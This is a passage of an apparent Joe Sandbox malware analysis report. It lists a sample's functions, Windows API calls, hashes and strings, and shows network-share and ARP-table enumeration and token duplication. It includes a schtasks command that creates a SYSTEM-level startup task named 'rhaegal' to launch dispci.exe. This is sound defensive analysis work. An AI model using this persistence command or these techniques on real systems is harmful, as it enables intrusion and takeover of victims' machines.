                                                                      Strings
                                                                      • ComSpec, xrefs: 04851034
                                                                      • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04851081
                                                                      • \cmd.exe, xrefs: 04851055
                                                                      • schtasks /Delete /F /TN rhaegal, xrefs: 0485100E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                      • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                      • API String ID: 2538701606-2521368254
                                                                      • Opcode ID: fbd98b09f8c74e066c5ecfcb876d0f224d1153b94eec0a2e7d644a027276bc2d
                                                                      • Instruction ID: 80a7dc6e5a15bf36161ad29c79d3e8b5efcc76d52868f5b1e06ced9f64606e43
                                                                      • Opcode Fuzzy Hash: fbd98b09f8c74e066c5ecfcb876d0f224d1153b94eec0a2e7d644a027276bc2d
                                                                      • Instruction Fuzzy Hash: DF019676A003186BDB60BA759C0CED777BDDB85605F004A61BE09E2111DA7CEA44CFB1
                                                                      Function 048511EF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04851204
                                                                      • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 0485124F
                                                                      • memmove.MSVCRT(00000000,00000000,00000800), ref: 04851302
                                                                      • memcpy.MSVCRT(00000000,cscc,?), ref: 04851315
                                                                      • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04851334
                                                                      • RegFlushKey.ADVAPI32(00000800), ref: 04851344
                                                                      • RegCloseKey.KERNELBASE(00000800), ref: 04851359
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                      • String ID: cscc
                                                                      • API String ID: 3731182797-3289078142
                                                                      • Opcode ID: 092236938b8a416dbee516b4ba9ba5e34d45c757055af19453b460b90bc750be
                                                                      • Instruction ID: ff0d657e744c2d007e048bff506303ccc26bc5726bcf0d5c397bc6c583ce431a
                                                                      • Opcode Fuzzy Hash: 092236938b8a416dbee516b4ba9ba5e34d45c757055af19453b460b90bc750be
                                                                      • Instruction Fuzzy Hash: 2C417E75900209EBDF109FA8DC49BDA7BB9FF04744F04CA65ED45E6160E735EA88CB90
                                                                      Function 0485742C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04857448
                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04857466
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485746D
                                                                      • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04857486
                                                                      • wsprintfW.USER32 ref: 048574D8
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857504
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485750B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                      • String ID: %u.%u.%u.%u
                                                                      • API String ID: 2259129056-1542503432
                                                                      • Opcode ID: 5791a9f99d6248df8537fd43ce9af60e5f339096447dffa67e7bbd2aff46714b
                                                                      • Instruction ID: c38866a8c608a37bbe7a9b7d970c0fbfcb96035c099c85813917d9c520cb095a
                                                                      • Opcode Fuzzy Hash: 5791a9f99d6248df8537fd43ce9af60e5f339096447dffa67e7bbd2aff46714b
                                                                      • Instruction Fuzzy Hash: F731A5B2900219ABDB119FA9DC84DBFBBFCEF89305F148956ED01E6141D278AA05DB70
                                                                      Function 04856E66 Relevance: 13.8, APIs: 11, Instructions: 95memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,74DEDF60,74DEF380,?,?,04856A84,?,?,?), ref: 04856E87
                                                                        • Part of subcall function 04856DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856DB5
                                                                        • Part of subcall function 04856DA4: LeaveCriticalSection.KERNEL32(?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856E0C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04856A84,?,?,?), ref: 04856EB8
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856EC1
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,04856A84,?,?,?), ref: 04856ED9
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856EDC
                                                                      • memcpy.MSVCRT(?,?,?,?,?,04856A84,?,?,?), ref: 04856F0D
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,04856A84,?,?,?), ref: 04856F26
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856F29
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04856A84,?,?,?), ref: 04856F41
                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856F48
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04856A84,?,?,?), ref: 04856F6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                      • String ID:
                                                                      • API String ID: 1369668251-0
                                                                      • Opcode ID: 8c2dc279df56f55dfac5d280f9eade2757e2e6a21ccf1e85ab2122f723b9c798
                                                                      • Instruction ID: 0fcb8453f260cdd212e7937e982256ffcbceb3c120de4c45d8be2d1856a1b143
                                                                      • Opcode Fuzzy Hash: 8c2dc279df56f55dfac5d280f9eade2757e2e6a21ccf1e85ab2122f723b9c798
                                                                      • Instruction Fuzzy Hash: 98315771A00A05ABDB219FA9D844D6AB7F9FF88304F408A08ED4AD7660EB35F915CF50
                                                                      Function 048510A7 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 100memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 048510DD
                                                                      • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 0485119F
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048511DC
                                                                      • HeapFree.KERNEL32(00000000), ref: 048511E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                      • String ID: %ALLUSERSPROFILE%$\$dispci.exe
                                                                      • API String ID: 1077166327-497635308
                                                                      • Opcode ID: c7a38d4c468eeaf2bd3e10e130526522c02c841f098e04afd06aca7d2840dace
                                                                      • Instruction ID: e371f5ab2eadfe2800ff3df1332eb69dceac2265f35059d1fc2fd69a9d0837ad
                                                                      • Opcode Fuzzy Hash: c7a38d4c468eeaf2bd3e10e130526522c02c841f098e04afd06aca7d2840dace
                                                                      • Instruction Fuzzy Hash: 1031A53594020E9ADF10BFE89C8DBE676A8EF04744F144EB5ED05C31A1F7B8AA848B50
                                                                      Function 048577D1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 58sleepthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 0485781B
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858B2E,?,00000000,00000000), ref: 0485783D
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 04857848
                                                                      • Sleep.KERNEL32(0002BF20,?,?), ref: 04857874
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseComputerCreateHandleNameSleepThread
                                                                      • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                      • API String ID: 452741230-4042105963
                                                                      • Opcode ID: 6df19c0054aa217868111ce422055dce1893cf0645d744e13afde3d16cf57600
                                                                      • Instruction ID: afe8cb4ab527a99e150d54a10a4c34c652099eabf77ededefd912483443dc099
                                                                      • Opcode Fuzzy Hash: 6df19c0054aa217868111ce422055dce1893cf0645d744e13afde3d16cf57600
                                                                      • Instruction Fuzzy Hash: E101B5F5500218BBF72077A99C8CD6BBABDDB45A58F504F28BE05F2021D6A8BD04D5B3
                                                                      Function 0485A476 Relevance: 12.1, APIs: 8, Instructions: 86networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0485A4A5
                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0485A4C3
                                                                      • htons.WS2_32(?), ref: 0485A4E3
                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0485A4F7
                                                                      • connect.WS2_32(00000000,?,00000010), ref: 0485A509
                                                                      • select.WS2_32(00000001,00000000,?,00000000,?), ref: 0485A536
                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0485A549
                                                                      • closesocket.WS2_32(00000000), ref: 0485A557
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                      • String ID:
                                                                      • API String ID: 1369790671-0
                                                                      • Opcode ID: 0c8ce56dca82e35bfaf1cc409c1d18d97ed61fe4b67ce0698bb414775b93c29e
                                                                      • Instruction ID: 93bc91a760a5f39c2672d57771a0223c57773c3f7521e31871d1e26b42b93708
                                                                      • Opcode Fuzzy Hash: 0c8ce56dca82e35bfaf1cc409c1d18d97ed61fe4b67ce0698bb414775b93c29e
                                                                      • Instruction Fuzzy Hash: 98317371800218BFDB10DFE8DC84DEEBBBCFF48310F004A5AE915E2150E7789A458B55
                                                                      Function 04857F04 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 04857F3B
                                                                      • wsprintfW.USER32 ref: 04857F7F
                                                                      • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 04857F8E
                                                                      • GetLastError.KERNEL32 ref: 04857F99
                                                                      • GetLastError.KERNEL32 ref: 04857FAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                      • String ID: %08X%08X
                                                                      • API String ID: 4289762557-1563805794
                                                                      • Opcode ID: 13b19504c4e54c4c9294e21ad85ad642cefa0cc16078c118b56fc4bc6341c794
                                                                      • Instruction ID: 078fd3669d623a7cc281ad954e5c099166ef09429a8b77107f61607894a0c305
                                                                      • Opcode Fuzzy Hash: 13b19504c4e54c4c9294e21ad85ad642cefa0cc16078c118b56fc4bc6341c794
                                                                      • Instruction Fuzzy Hash: E4112E72610209EBEB10EEE4D9849EEB7FDEF48744F104A65EE05E2150DB78ED058761
                                                                      Function 048575D8 Relevance: 9.1, APIs: 6, Instructions: 103sharememoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 048575FD
                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04857611
                                                                      • memset.MSVCRT ref: 0485762C
                                                                      • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04857640
                                                                      • GlobalFree.KERNEL32(00000000), ref: 048576D9
                                                                      • WNetCloseEnum.MPR(0000FFFF), ref: 048576E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                      • String ID:
                                                                      • API String ID: 4070278229-0
                                                                      • Opcode ID: 434863c2ca5d914c25e7625329576d332d6bfb1a83671f45de36ee968a526fc3
                                                                      • Instruction ID: 6f13c4fb504772dba1542f4bf0400f99d6d59ac2ade7aeef7d65a23bedafeff1
                                                                      • Opcode Fuzzy Hash: 434863c2ca5d914c25e7625329576d332d6bfb1a83671f45de36ee968a526fc3
                                                                      • Instruction Fuzzy Hash: 94319272800119EFDB20AF99C884DAEBBF9FF44304F50CA65ED05E7160D734AA44CB51
                                                                      Function 04858AB3 Relevance: 9.1, APIs: 6, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AD4
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AE1
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858AE4
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858B02
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858B09
                                                                      • LocalFree.KERNEL32(?,00002000,75C04920,74DF0F00), ref: 04858B1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3470587009-0
                                                                      • Opcode ID: b8942208d638a256866f8cb5826f9d1f5c265acc67f19287e0ca9ba676988bb5
                                                                      • Instruction ID: 6368b1a2fa14ced0a7edf35d3d79a985bb4387c61fd9c7ecbaa27202b650fe73
                                                                      • Opcode Fuzzy Hash: b8942208d638a256866f8cb5826f9d1f5c265acc67f19287e0ca9ba676988bb5
                                                                      • Instruction Fuzzy Hash: B8015EB2900314ABDB00AFB5DD88C5FBBACEF483547008D15E905E7111D678FE408A61
                                                                      Function 0485A016 Relevance: 7.6, APIs: 5, Instructions: 90threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 0485A035
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 0485A03C
                                                                      • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0485A059
                                                                      • CloseHandle.KERNEL32(?,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A0F5
                                                                      • CloseHandle.KERNEL32(0000FFFF,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A105
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                      • String ID:
                                                                      • API String ID: 3602278934-0
                                                                      • Opcode ID: 805c8390bdb83e24df40136a8e98bb0522dc242f9feb0b8fdbf2ca17ba75393f
                                                                      • Instruction ID: 35147fa6452e4ac49342060b362c89a080cc9c7ec6ea0ccd07eeed7d3f157551
                                                                      • Opcode Fuzzy Hash: 805c8390bdb83e24df40136a8e98bb0522dc242f9feb0b8fdbf2ca17ba75393f
                                                                      • Instruction Fuzzy Hash: 8B216F71504301AAE620EE659C88D5BBBECEFC5714F004F29B944E2161EA74A944CB63
                                                                      Function 04859376 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?,00000000,00000000), ref: 0485939C
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 048593C8
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 048593DF
                                                                      • inet_addr.WS2_32(?), ref: 048593E8
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04859418
                                                                        • Part of subcall function 04859332: gethostbyname.WS2_32(048593FF), ref: 0485933B
                                                                        • Part of subcall function 04859332: wsprintfA.USER32 ref: 04859365
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                      • String ID:
                                                                      • API String ID: 3160354238-0
                                                                      • Opcode ID: 0183b5762f57201183c74c630ac3f785a8a70b5dbce7d68400d36bd83607a7cb
                                                                      • Instruction ID: b43f024b931f3e6e14781f97aeb0c3dd9401b414bca15e9d213c448f50f203b3
                                                                      • Opcode Fuzzy Hash: 0183b5762f57201183c74c630ac3f785a8a70b5dbce7d68400d36bd83607a7cb
                                                                      • Instruction Fuzzy Hash: E92130B290011CBEEF50DE94DCC4DEE7BBCEB05364F504695F628D6190D674AE458F60
                                                                      Function 04856C5F Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C6F
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C78
                                                                      • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C81
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856CAC
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856CAF
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C29
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C2C
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C39
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C3C
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C4E
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C51
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C56
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C59
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                      • String ID:
                                                                      • API String ID: 1652351593-0
                                                                      • Opcode ID: bad62e885ef6972c879c9748ab0f17587152169db6585a803e08213f85c877c8
                                                                      • Instruction ID: 79631907c18a5fc51030a65cdb1ae3bda493d9618ad0901432afa96dd32865cb
                                                                      • Opcode Fuzzy Hash: bad62e885ef6972c879c9748ab0f17587152169db6585a803e08213f85c877c8
                                                                      • Instruction Fuzzy Hash: 45014B716007156BD320DFAAD840A1BF7ECFF48750F408A1AED49D7350DA74E9008BA4
                                                                      Function 0485A420 Relevance: 7.5, APIs: 5, Instructions: 40memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000004,74DF0F10,?,00000000,?,?,04857B89,000000FF), ref: 0485A436
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A439
